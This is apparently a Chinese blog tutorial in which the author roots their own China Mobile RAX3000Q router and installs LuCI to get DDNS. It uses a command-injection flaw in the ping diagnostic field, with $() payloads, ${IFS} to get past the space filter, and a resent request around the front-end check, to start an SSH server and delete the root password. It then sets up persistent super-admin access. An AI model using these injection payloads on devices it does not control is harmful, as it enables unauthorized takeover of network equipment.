提权进入中国移动RAX3000Q路由器的ssh并安装Luci

前言

因前几日买了台戴尔的服务器,而家里用的是移动,又申请不到公网ip,所以打算利用ipv6+ddns来整个半公网.

结果发现路由器不支持ddns,于是便开始想办法给路由器刷个固件啥的.

这里列一下前人经验:

https://blog.imlk.top/posts/rax3000q-get-shell/

https://blog.noel-zhang.work/post/other/rax3000q-ssh-openwrt/

https://blog.noel-zhang.work/post/other/rax3000q-luci/

首先感谢以上各位佬的文章,同时到作者这里教程应该是已经迭代了四次.

前文多多少少因各种原因出现些许漏洞或bug,因此请主要参照本文教程

渗透提权

首先进入后台页面(用户名默认为user,密码看路由器背面),进入电脑版-诊断-ping

并在”URL或者IP地址”的输入框中输入$(id),结果返回ping: bad address ‘uid=0(root) gid=0(root) groups=0(root)’

可知此处存在shell执行漏洞,并且可通过$()语法来执行shell命令

因为该表单框有字数限制,且不允许输入空格,因此用${IFS}来替代,但因为该过滤规则仅在前端生效,因此同样可以通过直接改写并重发请求来输入命令.

Dropbear

Dropbear是一个相对较小的SSH服务器和客户端,也是路由器于嵌入式linux常用的ssh工具之一

因此我们可以先通过执行$(dropbear${IFS}-p${IFS}22)来启动dropbear

然后再通过$(passwd${IFS}-d${IFS}root)来删除root的密码

接着在后台的”状态”页面中找到LAN IP,并通过ssh连接即可,笔者这里的LAN IP是192.168.1.4

所以连接命令为

ssh -p 22 root@192.168.1.4

(实际上当端口为22时,-p 22可以省去,但是root@不可省,否则便会出现账号权限错误)

不出意外这里应该就进去了,之后便是进行一些配置,以开启超级账号和其他服务一类

首先,先更改dropbear的配置文件,让他开机自启vi /etc/config/dropbear

config dropbear
option PasswordAuth 'on'
option RootPasswordAuth 'on'
option Port '22'
option enable '1'

vi按i进入编辑,按esc退出编辑模式,在输入:wq保存文件

接着执行

/etc/init.d/dropbear enable
/etc/init.d/dropbear start

来完成dropbear的配置.

接着执行以下代码来设置超级管理员账号:

mdlcfg -a SYS_SUPER_LOGIN_NAME="superadmin"
mdlcfg -a SYS_SUPER_LOGIN_NAME="superadmin"

然后再vi /etc/init.d/tz_process_start来编辑配置文件

并删除以下两段:

super_login_name=$(mdlcfg -g SYS_SUPER_LOGIN_NAME)
if [ -n "$super_login_name" ]; then
mdlcfg -d SYS_SUPER_LOGIN_NAME
mdlcfg -d SYS_SUPER_LOGIN_PWD
mdlcfg -d SYS_WEB_SUPER_PWD_RULE
mdlcfg -d SYS_SENIOR_LOGIN_NAME
mdlcfg -d SYS_SENIOR_LOGIN_PWD
mdlcfg -d SYS_WEB_SENIOR_PWD_RULE
mdlcfg -d SYS_WEB_SENIOR_PWD_HEAD
mdlcfg -c
fi

/bin/fota_start.sh restart >dev/null 2>&1 &

至此,ssh部分正式结束,路由器可做到开机自启ssh服务,同时可通过设定的超级账号进入路由器后台以使用更高级的功能.

路由器安装Luci

先通过执行

ln -s /lib/ld-musl-arm.so.1 /lib/ld-musl-armhf.so.1

理由(直接引用前人):

IPQ5018 是双核 Cortex-A53 处理器，opkg 默认的架构为 ipq，但是 OpenWrt 软件源里并没有这种架构，我们需要选择一个相近的架构。

根据 cpuinfo 信息判断应该是 armv7l 且支持 vfpv4 硬件浮点，但是内置的 interpreter 却是 /lib/ld-musl-arm.so.1，只支持软件浮点，这个问题可以创建一个软链接来解决

由于目前运行的QSDK是32位的，无法像这篇文章一样直接使用 aarch64_cortex-a53 的软件源，最终我选择的架构是 arm_cortex-a7_neon-vfpv4。

接着在 /etc/opkg.conf 中添加以下内容:

arch all 1
arch noarch 1
arch ipq 10
arch arm_cortex-a7_neon-vfpv4 20

接着进行依赖包及相关软件的安装,以下代码原文取自于大佬所总结的安装代码,但是截止至2023年,其中出现了几处404及依赖包相关的其他错误

笔者在这里进行了一些依赖库的增添与更换,并成功安装上了luci.

!!!注意,请单条逐次按顺序执行,请勿批量复制粘贴,以防造成不必要的依赖包覆盖问题!!!

opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libjson-script20210516_2021-05-16-b14c4688-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/uhttpd_2021-03-21-15346de8-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/base/lua_5.1.5-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-lib-nixio_git-20.356.64372-1259bb1-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-lib-ip_git-20.356.64372-1259bb1-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-lib-jsonc_git-20.356.64372-1259bb1-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/liblucihttp_2019-07-05-a34a17d5-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/liblucihttp-lua_2019-07-05-a34a17d5-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-base_git-20.356.64372-1259bb1-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-mod-admin-full_git-20.356.64372-1259bb1-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-theme-bootstrap_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-proto-ppp_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libnl-tiny1_2020-08-05-c291088f-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libubox20210516_2021-05-16-b14c4688-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libuci20130104_2021-04-14-4b3db117-5_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libubus20210630_2021-06-30-4fc532c8-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.ustc.edu.cn/openwrt/releases/21.02.0/packages/arm_cortex-a7_neon-vfpv4/base/libiwinfo-data_2022-08-19-0dad3e66-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.ustc.edu.cn/openwrt/releases/21.02.0/packages/arm_cortex-a7_neon-vfpv4/base/libiwinfo20210430_2022-08-19-0dad3e66-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/liblua5.1.5_5.1.5-9_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.ustc.edu.cn/openwrt/releases/21.02.0/packages/arm_cortex-a7_neon-vfpv4/base/libiwinfo-lua_2022-08-19-0dad3e66-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-proto-ipv6_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/rpcd-mod-rrdns_20170710_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.ustc.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/base/firewall_2018-08-13-1c4d5bcd-3_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-app-firewall_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/luci/luci-app-opkg_git-22.273.29015-e01e38c_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-proto-ppp_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libjson-c5_0.15-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libblobmsg-json20210516_2021-05-16-b14c4688-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/rpcd_2022-02-19-8d26a1ba-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-i18n-base-zh-cn_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-theme-material_git-20.356.64372-1259bb1-1_all.ipk

之后执行以下命令:

uci -q delete uhttpd.main.listen_http
uci add_list uhttpd.main.listen_http="0.0.0.0:8080"
uci add_list uhttpd.main.listen_http="[::]:8080"
uci commit uhttpd
/etc/init.d/rpcd enable
/etc/init.d/uhttpd enable
/etc/init.d/rpcd start
/etc/init.d/uhttpd start

最后在/etc/config/rpcd中添加以下内容:

config rpcd
option socket /var/run/ubus.sock
option timeout 30

退出并保存.此时,用户便可以通过LAN ip:8080进入相应的luci界面了

至此,SSH的提权及luci的安装都已结束.再次对本文中所引用文章的作者表示感谢.

接下来可以放开手脚整ddns了.jpg